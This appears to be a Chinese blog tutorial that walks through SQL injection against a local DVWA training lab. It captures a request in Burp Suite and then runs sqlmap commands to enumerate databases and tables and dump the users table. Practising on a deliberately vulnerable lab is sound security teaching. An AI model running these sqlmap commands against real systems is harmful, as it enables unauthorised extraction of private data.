利用sql注入漏洞,获得数据库的数据信息(实验仅供参考,要遵守网络安全法)

1.开启预先准备好的xampp靶机

 

2.在主机上打开火狐,在输入框输入http://172.16.12.13:81(172.16.12.13是靶机地址)

81代表的是dvwa的端口号

 

3.输入用户名:admin密码:password登录

 

4.把安全等级改为low级,点击提交

5.打开burp suite软件,设置拦截请求

(拦截http请求是建立在网络代理相同的情况下,可以手动配置)

 

6.打开火狐,点击sql注入,在输入框中输入1,点击提交

7.打开bs显示被拦截

 

8.全部选中,点击鼠标右键,选择复制到文件

 

9.创建一个名叫wn.txt的文件

10.打开sqlmap,输入python sqlmap.py -r “d:\wn.txt”--dbs

-r:读取系统文件

--dbs:枚举数据库名称

 

11.查到数据库dvwa,输入python sqlmap.py -r “d:\wn.txt” -D dvwa --tables

-D:指定数据库

--tables:查找数据库的中表

 

12.查询到users表,输入python sqlmap.py -r “d:\wn.txt” -D dvwa -T users

--dump

-T:指定数据库中的表

--dump:列举数据库的表中部分数据

 

 

13.至此sqlmap注入成功,成功得到数据库users表中的信息!

 

  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北极狐fox

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值